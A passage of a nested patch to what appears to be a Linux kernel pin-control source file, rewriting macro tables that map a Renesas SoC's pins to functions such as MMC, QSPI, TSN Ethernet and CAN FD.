++
++/* IP2SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR2_3_0	FM(CANFD4_TX)		F_(0, 0)		FM(PWM4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_7_4	FM(CANFD4_RX)		F_(0, 0)		FM(PWM5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_11_8	FM(CANFD7_TX)		F_(0, 0)		FM(PWM6)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_15_12	FM(CANFD7_RX)		F_(0, 0)		FM(PWM7)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR3 */
+-/* IP0SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR3_3_0	FM(MMC_SD_D1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_7_4	FM(MMC_SD_D0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_11_8	FM(MMC_SD_D2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_15_12	FM(MMC_SD_CLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_19_16	FM(MMC_DS)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_23_20	FM(MMC_SD_D3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_27_24	FM(MMC_D5)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_31_28	FM(MMC_D4)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR3_3_0	FM(MMC_D7)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_7_4	FM(MMC_D6)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_11_8	FM(MMC_SD_CMD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_15_12	FM(SD_CD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_19_16	FM(SD_WP)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)	FM(TCLK3_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_A)	FM(TCLK4_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_31_28	FM(QSPI0_SSL)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR3_3_0	FM(QSPI0_IO3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_7_4	FM(QSPI0_IO2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_11_8	FM(QSPI0_MISO_IO1)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_15_12	FM(QSPI0_MOSI_IO0)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_19_16	FM(QSPI0_SPCLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_23_20	FM(QSPI1_MOSI_IO0)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_27_24	FM(QSPI1_SPCLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_31_28	FM(QSPI1_MISO_IO1)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP3SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP3SR3_3_0	FM(QSPI1_IO2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_7_4	FM(QSPI1_SSL)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_11_8	FM(QSPI1_IO3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_15_12	FM(RPC_RESET_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_19_16	FM(RPC_WP_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_23_20	FM(RPC_INT_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR3_3_0	FM(MMC_SD_D1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_7_4	FM(MMC_SD_D0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_11_8	FM(MMC_SD_D2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_15_12	FM(MMC_SD_CLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_19_16	FM(MMC_DS)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_23_20	FM(MMC_SD_D3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_27_24	FM(MMC_D5)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_31_28	FM(MMC_D4)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR3_3_0	FM(MMC_D7)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_7_4	FM(MMC_D6)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_11_8	FM(MMC_SD_CMD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_15_12	FM(SD_CD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_19_16	FM(SD_WP)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)		FM(TCLK3_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_N_A)	FM(TCLK4_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR3_31_28	FM(QSPI0_SSL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR3_3_0	FM(QSPI0_IO3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_7_4	FM(QSPI0_IO2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_11_8	FM(QSPI0_MISO_IO1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_15_12	FM(QSPI0_MOSI_IO0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_19_16	FM(QSPI0_SPCLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_23_20	FM(QSPI1_MOSI_IO0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_27_24	FM(QSPI1_SPCLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR3_31_28	FM(QSPI1_MISO_IO1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR3_3_0	FM(QSPI1_IO2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_7_4	FM(QSPI1_SSL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_11_8	FM(QSPI1_IO3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_15_12	FM(RPC_RESET_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_19_16	FM(RPC_WP_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR3_23_20	FM(RPC_INT_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* SR4 */
++/* IP0SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR4_3_0	FM(TSN0_MDIO)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_7_4	FM(TSN0_MDC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_11_8	FM(TSN0_AVTP_PPS1)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_15_12	FM(TSN0_PHY_INT)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_19_16	FM(TSN0_LINK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_23_20	FM(TSN0_AVTP_MATCH)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_27_24	FM(TSN0_AVTP_CAPTURE)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR4_31_28	FM(TSN0_RX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR4_3_0	FM(TSN0_AVTP_PPS0)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_7_4	FM(TSN0_TX_CTL)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_11_8	FM(TSN0_RD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_15_12	FM(TSN0_RXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_19_16	FM(TSN0_TXC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_23_20	FM(TSN0_RD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_27_24	FM(TSN0_TD1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR4_31_28	FM(TSN0_TD0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR4_3_0	FM(TSN0_RD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_7_4	FM(TSN0_RD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_11_8	FM(TSN0_TD3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_15_12	FM(TSN0_TD2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_19_16	FM(TSN0_TXCREFCLK)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_23_20	FM(PCIE0_CLKREQ_N)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_27_24	FM(PCIE1_CLKREQ_N)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR4_31_28	FM(AVS0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR4 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR4_3_0	FM(AVS1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* SR5 */
++/* IP0SR5 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR5_3_0	FM(AVB2_AVTP_PPS)	F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
